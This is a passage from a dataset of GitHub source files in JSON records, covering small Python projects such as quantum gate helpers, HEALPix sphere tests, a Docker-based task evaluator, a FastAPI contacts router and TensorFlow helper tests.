row0)]\n    if FLIP_EDGES:\n        output_image[0, :] = edges\n        output_image[-1, :] = edges\n        output_image[:, 0] = edges\n        output_image[:, -1] = edges\n    return output_image\n\n\nfor k in range(NUM_ENHANCEMENTS):\n    print(k)\n    IMAGE = process(IMAGE, ((k+1) % 2))\n\nprint(IMAGE.sum())","repo_name":"nbridgland/Advent2021","sub_path":"python/day20/day20.py","file_name":"day20.py","file_ext":"py","file_size_in_byte":1640,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"4035545415","text":"import numpy as np\n\n\nclass Ray:\n    origin = np.zeros(3)\n    direction = np.zeros(3)\n\n    def __init__(self, origin, direction):\n        self.origin = origin\n        self.direction = direction\n\n    def point_at(self, t):\n        return self.origin + t * self.direction\n\n\nif __name__ == '__main__':\n    o = np.array([0, 1, 2])\n    d = np.array([3, 4, 5])\n    r = Ray(o, d)\n    print(f\"{r.origin} + 3 * {r.direction} = {r.point_at(3)}\")\n","repo_name":"tarrows/raytracing1w","sub_path":"ray.py","file_name":"ray.py","file_ext":"py","file_size_in_byte":435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"10337672088","text":"\"\"\"\nThis is just some stuff to help when doing some computations.\nIt's not really intended for plotting since most of the time the result\nof applying some operator has complex parts.\n\nI'd check out QuTiP for plotting on the Bloch sphere.\n\"\"\"\nimport matplotlib\n\ntry:\n    matplotlib.use('Qt5Agg')\nexcept ValueError as e:\n    print('Error: matplotlib backend\\n', e)\n    print('Trying:', matplotlib.get_backend())\n    matplotlib.use(matplotlib.get_backend())\nfinally:\n    import matplotlib.pyplot as plt\n\nimport numpy as np\nfrom numpy import linalg as la\n\n\"\"\"\nSome quantum gate matrices\nSince each is a numpy matrix, the adjoint of some operator P is P.H :\n\"\"\"\n\n# One, two and three parameter unitary operators\nU3 = lambda theta, phi, rho: np.mat([[np.cos(theta / 2), -np.exp(1j * rho) * np.sin(theta / 2)],\n                                     [np.exp(1j * phi) * np.sin(theta / 2),\n                                      np.exp(1j * rho + 1j * phi) * np.cos(theta / 2)]])\nU2 = lambda phi, rho: U3(np.pi / 2, phi, rho)\nU1 = lambda rho: U3(0, 0, rho)\n\n# Rotation gates (x,y,z)\nRx = lambda theta: U3(theta, -np.pi / 2, np.pi / 2)\nRy = lambda theta: U3(theta, 0, 0)\nRz = lambda phi: U1(phi)\n\n\"\"\"\nX: NOT (bit flip)\nZ: Phase flip\nY: Bit and phase flip\nH: Hadamard gate \nS: sqrt(Z), pi/2 phase rotation\nT: pi/4 phase rotation \n\"\"\"\nX = U3(np.pi, 0, np.pi)\nY = U3(np.pi, np.pi / 2, np.pi / 2)\nZ = U1(np.pi)\nH = U2(0, np.pi)\nS = U1(np.pi / 2)\nT = U1(np.pi / 4)\n\n# Controlled-NOT gate\nCNOT = np.mat([[1, 0, 0, 0],\n               [0, 1, 0, 0],\n               [0, 0, 0, 1],\n               [0, 0, 1, 0]])
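\n\n# A hedged sanity check of the definitions above: a unitary times its adjoint gives\n# the identity, and conjugating Z by H gives X, e.g.\n# assert np.allclose(H * H.H, np.eye(2))\n# assert np.allclose(H * Z * H, X)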
\n\n\n# ===== simple example, put basis vectors in superposition and plot(2d)\nfig, ax = plt.subplots()\nhw, hl = 0.1, 0.1\n\n# ground and excited states |0> and |1>\nket0 = np.mat('1;0')\nket1 = np.mat('0;1')\n\n# Superpositions |+> and |->\nb1 = np.real(H * ket0)\nb2 = np.real(H * ket1)\n\n\n# Plot some vectors\nk0 = ax.arrow(0, 0, ket0[0, 0], ket0[1, 0],\n              fc='C0', ec='C0', alpha=1, linestyle='-', head_width=hw, head_length=hl,\n              label=\"$\\\\vert 0 \\\\rangle $\")\n\nh0 = ax.arrow(0, 0, b1[0, 0], b1[1, 0],\n              fc='C0', ec='C0', alpha=0.5, linestyle='-', head_width=hw, head_length=hl,\n              label=\"$\\\\vert + \\\\rangle $\")\n\nk1 = ax.arrow(0, 0, ket1[0, 0], ket1[1, 0],\n              fc='C1', ec='C1', alpha=1, linestyle='-', head_width=hw, head_length=hl,\n              label=\"$\\\\vert 1 \\\\rangle $\")\n\nh1 = ax.arrow(0, 0, b2[0, 0], b2[1, 0],\n              fc='C1', ec='C1', alpha=0.5, linestyle='-', head_width=hw, head_length=hl,\n              label=\"$\\\\vert - \\\\rangle $\")\n\nax.legend(handles=[k0, k1, h0, h1],\n          bbox_to_anchor=(1.05, 1),\n          loc=2,\n          borderaxespad=0)\n\nax.axhline(color='k', alpha=0.2)\nax.axvline(color='k', alpha=0.2)\ns = 1.2\nax.axis([-s, s, -s, s])\nax.set_aspect('equal')\nplt.show()","repo_name":"johnharakas/quantum-qiskit","sub_path":"linalg-tools.py","file_name":"linalg-tools.py","file_ext":"py","file_size_in_byte":2832,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"9130426941","text":"import math\nimport scipy.constants\nimport scipy.stats\nimport numpy as np\n\ndef wmom(arrin, weights_in, inputmean=None, calcerr=False, sdev=False):\n    \"\"\"\n    NAME:\n      wmom()\n    \n    PURPOSE:\n      Calculate the weighted mean, error, and optionally standard deviation of\n      an input array.  By default error is calculated assuming the weights are\n      1/err^2, but if you send calcerr=True this assumption is dropped and the\n      error is determined from the weighted scatter.\n\n    CALLING SEQUENCE:\n     wmean,werr = wmom(arr, weights, inputmean=None, calcerr=False, sdev=False)\n    \n    INPUTS:\n      arr: A numpy array or a sequence that can be converted.\n      weights: A set of weights, one for each element in the array.\n    OPTIONAL INPUTS:\n      inputmean: \n          An input mean value, around which the mean is calculated.\n      calcerr=False: \n          Calculate the weighted error.  By default the error is calculated as\n          1/sqrt( weights.sum() ).  If calcerr=True it is calculated as sqrt(\n          (w**2 * (arr-mean)**2).sum() )/weights.sum()\n      sdev=False: \n          If True, also return the weighted standard deviation as a third\n          element in the tuple.\n\n    OUTPUTS:\n      wmean, werr: A tuple of the weighted mean and error. If sdev=True the\n         tuple will also contain sdev: wmean,werr,wsdev\n\n    REVISION HISTORY:\n      Converted from IDL: 2006-10-23. Erin Sheldon, NYU\n\n    \"\"\"
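\n    # Illustrative example (not part of the original source): with equal weights,\n    # wmom([1.0, 3.0], [1.0, 1.0]) gives wmean = 2.0 and werr = 1/sqrt(2) ~= 0.707.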
\n    \n    # no copy made if they are already arrays\n    arr = np.array(arrin, ndmin=1, copy=False)\n    \n    # Weights is forced to be type double. All resulting calculations\n    # will also be double\n    weights = np.array(weights_in, ndmin=1, dtype='f8', copy=False)\n    \n    wtot = weights.sum()\n    \n    # use the input mean value if one was provided, otherwise compute it\n    if inputmean is None:\n        wmean = ( weights*arr ).sum()/wtot\n    else:\n        wmean=float(inputmean)\n\n    # how should error be calculated?\n    if calcerr:\n        werr2 = ( weights**2 * (arr-wmean)**2 ).sum()\n        werr = np.sqrt( werr2 )/wtot\n    else:\n        werr = 1.0/np.sqrt(wtot)\n\n    # should output include the weighted standard deviation?\n    if sdev:\n        wvar = ( weights*(arr-wmean)**2 ).sum()/wtot\n        wsdev = np.sqrt(wvar)\n        return wmean,werr,wsdev\n    else:\n        return wmean,werr","repo_name":"mantidproject/vesuvio","sub_path":"unpackaged/vesuvio_calibration/weighted_average.py","file_name":"weighted_average.py","file_ext":"py","file_size_in_byte":2306,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"74067601528","text":"try:\n    import unittest2 as unittest\nexcept ImportError:\n    import unittest\n\nfrom sheet.parser.fl_cell_range_parse_node import FLCellRangeParseNode\nfrom sheet.parser.parse_node import ParseNode\nfrom sheet.parser.fl_cell_reference_parse_node import FLCellReferenceParseNode\n\nclass FLCellRangeParseNodeTest(unittest.TestCase):\n\n    def testConstructor(self):\n        flCellRange = FLCellRangeParseNode([\"A1\", \":\", \"D2\"])\n        self.assertEquals(flCellRange.type, ParseNode.FL_CELL_RANGE,\n                          \"Node was of the wrong type\")\n        self.assertEquals(flCellRange.children, [\"A1\", \":\", \"D2\"],\n                          \"Node had the wrong children\")\n\n    def testStr(self):\n        node = FLCellRangeParseNode([\"a1\", \":\", \"g8\"])\n        self.assertEquals(str(node),\n                          \"\",\n                          \"Wrong string representation\")\n\n\n    def testRegisteredWithParse(self):\n        \"test registered with ParseNode\"\n        self.assertEquals(\n            type(ParseNode.construct_node(\n                ParseNode.FL_CELL_RANGE, ['a1', ':', 'b4'])),\n            FLCellRangeParseNode,\n            \"Class is not registered with ParseNode\")\n\n\n    def testCellReferences(self):\n        first = FLCellReferenceParseNode(['a1'])\n        second = FLCellReferenceParseNode(['g8'])\n        node = FLCellRangeParseNode([first, \":\", second])\n\n        self.assertEquals(node.first_cell_reference, first)\n        self.assertEquals(node.second_cell_reference, second)\n\n        another = FLCellReferenceParseNode(['c2'])\n        node.first_cell_reference = another\n        self.assertEquals(node.first_cell_reference, another)\n\n        node.second_cell_reference = another\n        self.assertEquals(node.second_cell_reference, another)\n\n\n    def testColon(self):\n        first = FLCellReferenceParseNode(['a1'])\n        second = FLCellReferenceParseNode(['g8'])\n        node = FLCellRangeParseNode([first, \":\", second])\n        self.assertEquals(node.colon, \":\")\n\n\n\n","repo_name":"pythonanywhere/dirigible-spreadsheet","sub_path":"dirigible/sheet/tests/parser/test_fl_cell_range_parse_node.py","file_name":"test_fl_cell_range_parse_node.py","file_ext":"py","file_size_in_byte":2004,"program_lang":"python","lang":"en","doc_type":"code","stars":206,"dataset":"github-code","pt":"77"} +{"seq_id":"11071100472","text":"from flask import Flask, request, session, g, redirect, url_for, abort, render_template, flash\nimport datetime, os\n\nDEBUG = True\napp = Flask(__name__)\napp.config.from_object(__name__)\n \n###############################################\n#Routes\n###############################################\n@app.route('/')\ndef home():\n    return render_template('home.html', title='home', page='home') \n\nif __name__ == '__main__':\n    app.run()\n    \napplication = 
app","repo_name":"GeorgeErickson/htmlfresh","sub_path":"wsgi.py","file_name":"wsgi.py","file_ext":"py","file_size_in_byte":450,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"4225319474","text":"import unittest\nimport logging\nimport os\nimport datetime\nimport numpy as np\n\nfrom disko import HealpixSubSphere, HealpixSphere\nfrom disko import fov\n\nLOGGER = logging.getLogger(__name__)\n# Add a null handler so logs can go somewhere\nLOGGER.addHandler(logging.NullHandler())\nLOGGER.setLevel(logging.INFO)\n\n\nclass TestSubsphere(unittest.TestCase):\n\n def setUp(self):\n # Theta is co-latitude measured southward from the north pole\n # Phi is [0..2pi]\n self.sphere = HealpixSubSphere(res_arcmin=60.0,\n theta=np.radians(10.0),\n phi=0.0, radius_rad=np.radians(1))\n self.sphere.set_info(timestamp=datetime.datetime.now(),\n lon=170.5, lat=-45.5, height=42)\n\n def test_area(self):\n sky = HealpixSphere(nside=128)\n\n self.assertAlmostEqual(sky.get_area(), 4*np.pi)\n\n hemisphere = HealpixSubSphere(res_arcmin=60.0,\n theta=np.radians(0.0),\n phi=0.0, radius_rad=np.radians(90))\n self.assertAlmostEqual(hemisphere.get_area(), 2*np.pi, 1)\n\n def test_copy(self):\n sky = HealpixSphere(nside=128)\n sky2 = sky.copy()\n sky.pixels += 1\n self.assertFalse(np.allclose(sky.pixels, sky2.pixels))\n self.assertTrue(np.allclose(sky.pixel_areas, sky2.pixel_areas))\n self.assertEqual(sky.nside, sky2.nside)\n sph3 = self.sphere.copy()\n sph3.pixels += 1\n self.assertFalse(np.allclose(self.sphere.pixels, sph3.pixels))\n self.assertTrue(np.allclose(self.sphere.pixel_areas, sph3.pixel_areas))\n\n def test_big_subsphere(self):\n # Check that a full subsphere is the same as the sphere.\n res_deg = 3.0\n big = HealpixSubSphere(res_arcmin=res_deg*60.0,\n theta=np.radians(0.0), phi=0.0,\n radius_rad=np.radians(180))\n old = HealpixSphere(32)\n\n self.assertEqual(big.nside, 32)\n self.assertEqual(big.npix, old.npix)\n\n def test_tiny_subsphere(self):\n # Check that a full subsphere is the same as the sphere.\n res_deg = 0.5\n tiny = HealpixSubSphere(res_arcmin=res_deg*60.0,\n theta=np.radians(0.0),\n phi=0.0, radius_rad=np.radians(5))\n\n self.assertEqual(tiny.nside, 128)\n self.assertEqual(tiny.npix, 364)\n\n def test_sizes(self):\n self.assertEqual(self.sphere.npix, self.sphere.el_r.shape[0])\n self.assertEqual(self.sphere.npix, self.sphere.l.shape[0])\n\n def test_svg(self):\n res_deg = 10\n fname = 'test.svg'\n big = HealpixSubSphere(res_arcmin=res_deg*60.0,\n theta=np.radians(0.0), phi=0.0,\n radius_rad=np.radians(45))\n\n big.to_svg(fname=fname, pixels_only=True, show_cbar=False)\n self.assertTrue(os.path.isfile(fname))\n os.remove(fname)\n\n def test_fits(self):\n res_deg = 10\n fname = 'test.fits'\n big = HealpixSubSphere(res_arcmin=res_deg*60.0,\n theta=np.radians(0.0), phi=0.0,\n radius_rad=np.radians(45))\n\n big.to_fits(fname=fname)\n self.assertTrue(os.path.isfile(fname))\n os.remove(fname)\n\n def test_load_save(self):\n res_deg = 10\n sph = HealpixSubSphere(res_arcmin=res_deg*60.0,\n theta=np.radians(0.0), phi=0.0,\n radius_rad=np.radians(45))\n\n sph.set_info(timestamp=datetime.datetime.now(),\n lon=170.5, lat=-45.5, height=42)\n\n sph.to_hdf('test.h5')\n\n sph2 = fov.from_hdf('test.h5')\n\n self.assertTrue(np.allclose(sph.pixels, sph2.pixels))\n self.assertTrue(np.allclose(sph.pixel_areas, sph2.pixel_areas))\n self.assertTrue(np.allclose(sph.pixel_indices, sph2.pixel_indices))\n\n def test_indexing(self):\n sph = 
HealpixSubSphere(res_arcmin=60.0,\n                               theta=np.radians(0.0), phi=0.0,\n                               radius_rad=np.radians(90))\n\n        for i in range(500):\n            el = np.random.uniform(np.radians(1), np.radians(90))\n            az = np.random.uniform(np.radians(-180), np.radians(180))\n            ind = sph.index_of(el, az)\n            self.assertTrue(ind < sph.npix)\n","repo_name":"tmolteno/disko","sub_path":"disko/tests/test_subsphere.py","file_name":"test_subsphere.py","file_ext":"py","file_size_in_byte":4456,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"8355338457","text":"def bubble(alist):\n    # compare neighbours within the shrinking unsorted prefix; use the parameter\n    # rather than the global list so the function works for any input\n    for i in range(len(alist) - 1, 0, -1):\n        for t in range(i):\n            if alist[t] > alist[t + 1]:\n                alist[t], alist[t + 1] = alist[t + 1], alist[t]\n    return alist\n\n\na = [11, 333, 2423, 22, 5, 32, 3]\nb = bubble(a)\nprint(b)\n","repo_name":"tjhlp/numpytest","sub_path":"numpytest/test/test5.py","file_name":"test5.py","file_ext":"py","file_size_in_byte":245,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"36729474550","text":"from Products.CMFCore.utils import getToolByName\nfrom Products.Five import BrowserView\nfrom Products.statusmessages.interfaces import IStatusMessage\nfrom zope.interface import implements, Interface\n\nTYPES_WHITE_LIST = ['Folder', 'Image']\n\n\nclass ITranslateContentsView(Interface):\n    \"\"\"\n    TranslateContents view interface\n    \"\"\"\n\n\nclass TranslateContentsView(BrowserView):\n    \"\"\"\n    TranslateContents browser view\n    \"\"\"\n    implements(ITranslateContentsView)\n\n    def __init__(self, context, request):\n        self.context = context\n        self.request = request\n        self.language = request.get('LANGUAGE')\n        self.dig = request.get('dig', True)\n\n    def __call__(self):\n        catalog = getToolByName(self.context, 'portal_catalog')\n\n        query = dict(\n            portal_type = TYPES_WHITE_LIST,\n        )\n\n        if self.dig:\n            query['path'] = '/'.join(self.context.getPhysicalPath())\n        else:\n            query['path'] = {'query': '/'.join(self.context.getPhysicalPath()), 'depth': 1}\n\n        brains = catalog(query)\n\n        processed = 0\n\n        langs = [x for x in self.getLanguages() if x != self.language]\n\n        totals = len(brains)\n\n        brains = [x for x in brains]\n\n        # we sort brains on path length so we always start translating from the container\n        brains.sort(lambda x, y: cmp(len(x.getPath().split('/')), len(y.getPath().split('/'))))\n\n        # link already-present content with the same id if it is not linked yet\n\n        for brain in brains:\n            processed += 1\n            self.context.plone_log('Processing [%s] %s of %s' % (brain.Title, processed, totals))\n            obj = brain.getObject()\n\n            for lang in langs:\n                if not obj.hasTranslation(lang):\n\n                    # if we have same ids in the translated parent we link them;\n                    # we consider this like a precondition\n                    parent = obj.aq_parent\n                    if parent.hasTranslation(lang):\n                        translated_parent = parent.getTranslation(lang)\n                        obj_id = obj.getId()\n                        if obj_id in translated_parent.keys():\n                            translation = getattr(translated_parent, obj_id)\n                            obj.linkTranslation(link_language = lang, link_content = translation.UID())\n                            self.context.plone_log(\"--> linking %s for %s\" % (obj_id, lang))\n                            continue\n\n                    # else we simply create new language content\n                    self.context.plone_log(\"--> %s creating\" % lang)\n                    translated = obj.addTranslation(lang)\n\n                    translated.setTitle(obj.Title())\n                    translated.reindexObject()\n                else:\n                    self.context.plone_log(\"--> %s already exists\" % lang)\n\n        IStatusMessage(self.request).addStatusMessage(u\"Immagini tradotte correttamente\", type = 'info')\n        response = self.request.RESPONSE\n        return 
response.redirect(self.context.absolute_url())\n\n    def getLanguages(self):\n        \"\"\"\n        Return a list of active languages as an ordered dictionary, with the preferred language first.\n\n        Example output::\n\n            {\n             u'fi': {u'id' : u'fi', u'flag': u'/++resource++country-flags/fi.gif', u'name': u'Finnish', u'native': u'Suomi'},\n             u'de': {u'id' : u'de', u'flag': u'/++resource++country-flags/de.gif', u'name': u'German', u'native': u'Deutsch'},\n             u'en': {u'id' : u'en', u'flag': u'/++resource++country-flags/gb.gif', u'name': u'English', u'native': u'English'},\n             u'ru': {u'id' : u'ru', u'flag': u'/++resource++country-flags/ru.gif', u'name': u'Russian', u'native': u'\\u0420\\u0443\\u0441\\u0441\\u043a\\u0438\\u0439'}\n            }\n        \"\"\"\n        result = {}\n\n        portal_languages = self.context.portal_languages\n\n        # Get barebone language listing from portal_languages tool\n        langs = portal_languages.getAvailableLanguages()\n\n        preferred = portal_languages.getPreferredLanguage()\n\n        # Preferred first\n        for lang, data in langs.items():\n            if lang == preferred:\n                result[lang] = data\n\n        # Then other languages\n        for lang, data in langs.items():\n            if lang != preferred:\n                result[lang] = data\n\n        # For convenience, include the language ISO code in the export,\n        # so it is easier to iterate data in the templates\n        for lang, data in result.items():\n            data[\"id\"] = lang\n\n        return result\n","repo_name":"Umanot/Site","sub_path":"umanot.site/umanot/site/browser/translate_contents.py","file_name":"translate_contents.py","file_ext":"py","file_size_in_byte":4611,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"821576502","text":"import io\nimport logging\nimport tarfile\nfrom typing import Any, List\n\nfrom docker import DockerClient\n\n\nclass ContentFile:\n    \"\"\" This class represents a file with content and the file's path.\n    \"\"\"\n    def __init__(self, filepath: str, content: Any):\n        \"\"\" Initialize a ContentFile instance.\n\n        :param filepath: filepath of file\n        :param content: content of file\n        \"\"\"\n        self.filepath = filepath\n        self.content = content\n\n\nclass DockerContainer:\n    \"\"\" This class represents Docker containers.\n    \"\"\"\n    def __init__(self, name: str, docker_client: DockerClient):\n        \"\"\" Initialize a DockerContainer instance.\n\n        :param name: name of container\n        :param docker_client: docker client\n        \"\"\"\n        self.result_observers = []\n        self.name = name\n        self.docker_client = docker_client\n        self.phy_container = self.docker_client.containers.get(self.name)\n\n    def upload_content_files(self, content_files: List[ContentFile]):\n        \"\"\" Upload a list of config files.\n\n        :param content_files: list of config files\n        :return: None\n        \"\"\"\n        logging.info(\"Creating archive...\")\n\n        # create archive with content files\n        fh = io.BytesIO()\n        with tarfile.open(fileobj=fh, mode='w') as tar:\n            for content_file in content_files:\n                data = content_file.content.encode(\"utf-8\")\n                info = tarfile.TarInfo(content_file.filepath)\n                info.size = len(data)\n                tar.addfile(info, io.BytesIO(initial_bytes=data))\n\n        # upload tar file\n        self._upload_tar_file_inner(fh.getvalue())\n\n    def _upload_tar_file_inner(self, tar_data: bytes):\n        \"\"\" Upload a tar file to the container.\n\n        :param tar_data: tar archive (as bytes) containing ContentFiles\n        :return: None\n        \"\"\"\n        self.phy_container.start()\n        logging.info(\"Uploading content files...\")\n        self.phy_container.put_archive(path=\"/home/sage/sage\", data=tar_data)\n\n    def run_task_solver(self, command: str, request_id: int):\n        \"\"\" 
Run the container with the specified command and notify observers with the result.\n\n        :param command: command to run\n        :param request_id: ID of request\n        :return: None\n        \"\"\"\n        logging.info(f\"Running command for request {request_id}: {command}\")\n        # start container and run command\n        self.phy_container.start()\n        result = self.phy_container.exec_run(cmd=command, workdir=\"/home/sage/sage\", tty=True)\n\n        # process result\n        # TODO: use exit code to get result\n        output_string = result.output.decode(\"utf-8\").strip()\n        if not output_string:\n            logging.error(f\"No output log from task request {request_id} received!\")\n        output_log_entries = output_string.split(\"\\n\")\n\n        # check if the result is correct and send it to the observers\n        is_correct = output_log_entries[-1] == \"True\"\n        self.call_observers(request_id, is_correct)\n\n    def add_result_observer(self, observer):\n        \"\"\" Add observers for new results.\n\n        :param observer: function to be triggered\n        :return: None\n        \"\"\"\n        self.result_observers.append(observer)\n\n    def call_observers(self, request_id: int, result: bool):\n        \"\"\" Call all registered observers.\n\n        :param request_id: ID of request\n        :param result: task result\n        :return: None\n        \"\"\"\n        for observer in self.result_observers:\n            observer(request_id, result)\n\n    def vanish(self):\n        \"\"\" Remove this container.\n\n        :return: None\n        \"\"\"\n        try:\n            logging.info(f\"Removing container {self.name}...\")\n            self.phy_container.stop()\n            self.phy_container.remove()\n        except:\n            pass\n","repo_name":"MathGrass/mathgrass-local-mq-evaluator","sub_path":"docker_container.py","file_name":"docker_container.py","file_ext":"py","file_size_in_byte":3797,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"23116191477","text":"from fastapi import APIRouter\nfrom pydantic import BaseModel\nfrom Models.Persona import Persona\nfrom Models.Contacto import Contacto\nfrom bbdd import engine\nfrom sqlalchemy.orm import Session\nfrom fastapi import Depends\nfrom .Auth import checkear_logueo\n\n\nrouter = APIRouter(\n    prefix=\"/contacto\",\n    tags=[\"Contacto\"]\n)\n\nclass contactoJson (BaseModel):\n    idPersona: int\n    valor: str\n\n# add a phone number to a persona, looked up by the idPersona given in the JSON body\n@router.put(\"/agregarTelefono\")\nasync def agregar_telefono(contacto: contactoJson, user: str = Depends(checkear_logueo)):\n    try:\n        with Session(engine) as sesion: \n            personaDB = sesion.query(Persona).filter(Persona.id == contacto.idPersona).first()\n            if personaDB is None:\n                return {\"message\": \"No se ha encontrado la persona\"}\n            else:\n                contactoDB = Contacto(tipoContacto=\"Telefono\", valor=contacto.valor)\n                personaDB.contactos.append(contactoDB)\n                sesion.commit()\n                sesion.refresh(personaDB)\n\n                return {\"message\": \"Telefono agregado a la persona\",\n                        \"id\": personaDB.id,\n                        \"nombre\": personaDB.nombre,\n                        \"apellido\": personaDB.apellido,\n                        \"contactos\": [{\"tipoContacto\": contactoDB.tipoContacto,\n                                       \"valor\": contactoDB.valor} for contactoDB in personaDB.contactos]\n                        }\n    except Exception as e:\n        return {\"error\" : str(e)}\n
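\n# Hypothetical request for the endpoint above (shape inferred from contactoJson, not\n# from the project's docs):\n#   PUT /contacto/agregarTelefono with JSON body {\"idPersona\": 1, \"valor\": \"555-0100\"}\n# A valid login is required because of the checkear_logueo dependency.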
\n@router.put(\"/agregarDireccion\")\nasync def agregar_direccion(contacto: contactoJson, user: str = Depends(checkear_logueo)):\n    try:\n        with Session(engine) as sesion: \n            personaDB = sesion.query(Persona).filter(Persona.id == contacto.idPersona).first()\n            if personaDB is None:\n                return {\"message\": \"No se ha encontrado la persona\"}\n            else:\n                contactoDB = Contacto(tipoContacto=\"Direccion\", valor=contacto.valor)\n                personaDB.contactos.append(contactoDB)\n                sesion.commit()\n                sesion.refresh(personaDB)\n\n                return {\"message\": \"Direccion agregada a la persona\",\n                        \"id\": personaDB.id,\n                        \"nombre\": personaDB.nombre,\n                        \"apellido\": personaDB.apellido,\n                        \"contactos\": [{\"tipoContacto\": contactoDB.tipoContacto,\n                                       \"valor\": contactoDB.valor} for contactoDB in personaDB.contactos]\n                        }\n    except Exception as e:\n        return {\"error\" : str(e)}\n\n@router.delete(\"/{idContacto}\")\nasync def eliminar_contacto(idContacto: int, user: str = Depends(checkear_logueo)):\n    try:\n        with Session(engine) as sesion:\n            contactoDB = sesion.query(Contacto).filter(Contacto.id == idContacto).first()\n            if contactoDB is None:\n                return {\"message\": \"No se ha encontrado el contacto\"}\n            else:\n                sesion.delete(contactoDB)\n                sesion.commit()\n                return {\"message\": \"Contacto eliminado\"}\n    except Exception as e:\n        return {\"error\" : str(e)}\n","repo_name":"tgandini/ApiAgenda","sub_path":"Routers/Contacto.py","file_name":"Contacto.py","file_ext":"py","file_size_in_byte":3242,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"23189071767","text":"'''\nDesign an algorithm to encode a list of strings to a string. The encoded string is then sent over the network and is decoded\nback to the original list of strings. Please implement encode and decode.\n\nInput = [\"lint\", \"code\", \"love\", \"you\"]\nOutput = [\"lint\", \"code\", \"love\", \"you\"]\none possible encoding is: \"lint:;code:;love:;you\"\n\n'''\ndef encode(strs):\n    res = \"\"\n    for s in strs:\n        res += str(len(s)) + \"#\" + s\n    return res\n\nprint(encode([\"lint\", \"code\", \"love\", \"you\"]))\n\ndef decode(s):\n    res = []\n    i = 0\n\n    while i < len(s):\n        j = i\n        while s[j] != \"#\":\n            j += 1\n        length = int(s[i:j])\n        res.append(s[j + 1 : j + 1 + length])\n        i = j + 1 + length\n    return res\n\nprint(decode(\"4#lint4#code4#love3#you\"))\n\n\n\n\n\n\n\n","repo_name":"aliceboone/Phyton","sub_path":"NeetCode/Array/7-encode_decode.py","file_name":"7-encode_decode.py","file_ext":"py","file_size_in_byte":779,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"33131766327","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport tensorflow as tf\n\nfrom tensorflow_constrained_optimization.python.rates import helpers\n\n# These tests use some placeholder Tensors, so we want to make sure that they\n# execute in graph mode.\ntf.compat.v1.disable_eager_execution()\n\n\nclass HelpersTest(tf.test.TestCase):\n  \"\"\"Tests for helper functions in helpers.py.\"\"\"\n\n  def test_convert_to_1d_tensor(self):\n    \"\"\"Tests the \"convert_to_1d_tensor\" function.\"\"\"\n    self.assertFalse(tf.executing_eagerly())\n\n    # Trying to make a rank-1 Tensor from a 0d Tensor should succeed.\n    expected = [2.7]\n    actual = helpers.convert_to_1d_tensor(2.7)\n    with self.session() as session:\n      self.assertAllClose(expected, session.run(actual), rtol=0, atol=1e-6)\n\n    # Trying to make a rank-1 Tensor from a rank-1 Tensor should succeed.\n    expected = [-6.3, 1.0, 5.1]\n    actual = helpers.convert_to_1d_tensor(expected)\n    with self.session() as session:\n      self.assertAllClose(expected, session.run(actual), rtol=0, atol=1e-6)\n\n    # Trying to make a rank-1 Tensor from a shape-(1,2,1) Tensor should succeed\n    # (only one of the dimensions is nontrivial).\n    expected = [3.6, -1.7]\n    actual = helpers.convert_to_1d_tensor([[[3.6], 
[-1.7]]])\n with self.session() as session:\n self.assertAllClose(expected, session.run(actual), rtol=0, atol=1e-6)\n\n # Trying to make a rank-1 Tensor from a shape-(1,None,1) Tensor should\n # succeed (only one of the dimensions is nontrivial).\n expected = [0.2, -2.4, 0.0]\n placeholder = tf.compat.v1.placeholder(tf.float32, shape=(1, None, 1))\n actual = helpers.convert_to_1d_tensor(placeholder)\n with self.session() as session:\n self.assertAllClose(\n expected,\n session.run(\n actual, feed_dict={placeholder: [[[0.2], [-2.4], [0.0]]]}),\n rtol=0,\n atol=1e-6)\n\n # Trying to make a rank-1 Tensor from a rank-2 Tensor should fail.\n with self.assertRaises(ValueError):\n _ = helpers.convert_to_1d_tensor([[1, 2], [3, 4]])\n\n # Trying to make a rank-1 Tensor from a shape-(None,2) Tensor should fail.\n placeholder = tf.compat.v1.placeholder(tf.float32, shape=(None, 2))\n with self.assertRaises(ValueError):\n _ = helpers.convert_to_1d_tensor(placeholder)\n\n def test_get_num_columns_of_2d_tensor(self):\n \"\"\"Tests the \"get_num_columns_of_2d_tensor\" function.\"\"\"\n self.assertFalse(tf.executing_eagerly())\n\n # Trying to get the number of columns from a non-tensor should fail.\n with self.assertRaises(TypeError):\n _ = helpers.get_num_columns_of_2d_tensor([[1, 2], [3, 4]])\n\n # Trying to get the number of columns from a rank-1 tensor should fail.\n tensor = tf.convert_to_tensor([1, 2, 3, 4])\n with self.assertRaises(ValueError):\n _ = helpers.get_num_columns_of_2d_tensor(tensor)\n\n # Make sure that we successfully get the number of columns.\n tensor = tf.convert_to_tensor([[1, 2, 3]])\n self.assertEqual(3, helpers.get_num_columns_of_2d_tensor(tensor))\n\n def test_get_num_elements_of_tensor(self):\n \"\"\"Tests the \"get_num_elements_of_tensor\" function.\"\"\"\n self.assertFalse(tf.executing_eagerly())\n\n # Trying to get the number of elements of a non-tensor should fail.\n with self.assertRaises(TypeError):\n _ = helpers.get_num_elements_of_tensor([[1, 2], [3, 4]])\n\n # Trying to get the number of elements of a tensor with unknown shape should\n # fail.\n tensor = tf.compat.v1.placeholder(tf.float32, shape=None)\n with self.assertRaises(ValueError):\n _ = helpers.get_num_elements_of_tensor(tensor)\n\n # Trying to get the number of elements of a tensor with partially-unknown\n # shape should fail.\n tensor = tf.compat.v1.placeholder(tf.float32, shape=(1, None, 1))\n with self.assertRaises(ValueError):\n _ = helpers.get_num_elements_of_tensor(tensor)\n\n # 